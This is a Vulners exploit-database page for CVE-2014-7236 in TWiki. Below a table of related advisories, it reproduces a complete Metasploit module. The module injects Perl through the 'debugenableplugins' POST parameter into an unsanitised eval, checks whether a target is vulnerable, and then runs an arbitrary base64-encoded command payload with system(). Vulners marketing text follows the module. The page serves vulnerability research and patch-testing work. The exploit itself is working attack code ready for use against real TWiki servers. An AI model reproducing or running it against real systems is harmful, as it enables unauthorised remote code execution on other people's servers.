Vulners
Lucene search
TWiki Debugenableplugins Remote Code Execution Exploit
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
 | Twiki Perl 4.x, 5.x, 6.x Upload Bypass / Code Execution Vulnerabilities | 10 Oct 201400:00 | – | zdt |
 | twiki -- remote Perl code execution | 9 Oct 201400:00 | – | freebsd |
 | CVE-2014-7236 | 19 Mar 201500:00 | – | circl |
 | Twiki Unauthenticated Remote Code Execution (CVE-2014-7236) | 3 Dec 201400:00 | – | checkpoint_advisories |
 | CVE-2014-7236 | 17 Feb 202021:14 | – | cve |
 | CVE-2014-7236 | 17 Feb 202021:14 | – | cvelist |
 | TWiki debugenableplugins RCE | 1 Sep 201500:00 | – | dsquare |
 | TWiki Debugenableplugins - Remote Code Execution (Metasploit) | 19 Mar 201500:00 | – | exploitdb |
 | FreeBSD : twiki -- remote Perl code execution (21ce1840-6107-11e4-9e84-0022156e8794) | 3 Nov 201400:00 | – | nessus |
| TWiki 'debugenableplugins' Parameter RCE | 20 Apr 201500:00 | – | nessus |
10
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'TWiki Debugenableplugins Remote Code Execution',
'Description' => %q{
TWiki 4.0.x-6.0.0 contains a vulnerability in the Debug functionality.
The value of the debugenableplugins parameter is used without proper sanitization
in an Perl eval statement which allows remote code execution
},
'Author' =>
[
'Netanel Rubin', # from Check Point - Discovery
'h0ng10', # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-7236'],
[ 'OSVDB', '112977'],
[ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236']
],
'Privileged' => false,
'Targets' =>
[
[ 'Automatic',
{
'Payload' =>
{
'BadChars' => "",
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl python php',
}
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 09 2014'))
register_options(
[
OptString.new('TARGETURI', [ true, "TWiki path", '/do/view/Main/WebHome' ]),
OptString.new('PLUGIN', [true, "A existing TWiki Plugin", 'BackupRestorePlugin'])
], self.class)
end
def send_code(perl_code)
uri = target_uri.path
data = "debugenableplugins=#{datastore['PLUGIN']}%3b" + CGI.escape(perl_code) + "%3bexit"
res = send_request_cgi!({
'method' => 'POST',
'uri' => uri,
'data' => data
})
return res
end
def check
rand_1 = rand_text_alpha(5)
rand_2 = rand_text_alpha(5)
code = "print(\"Content-Type:text/html\\r\\n\\r\\n#{rand_1}\".\"#{rand_2}\")"
res = send_code(code)
if res and res.code == 200
return CheckCode::Vulnerable if res.body == rand_1 + rand_2
end
CheckCode::Unknown
end
def exploit
code = "print(\"Content-Type:text/html\\r\\n\\r\\n\");"
code += "require('MIME/Base64.pm');MIME::Base64->import();"
code += "system(decode_base64('#{Rex::Text.encode_base64(payload.encoded)}'));exit"
res = send_code(code)
handler
end
end
# 0day.today [2018-04-14] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Mar 2015 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.84226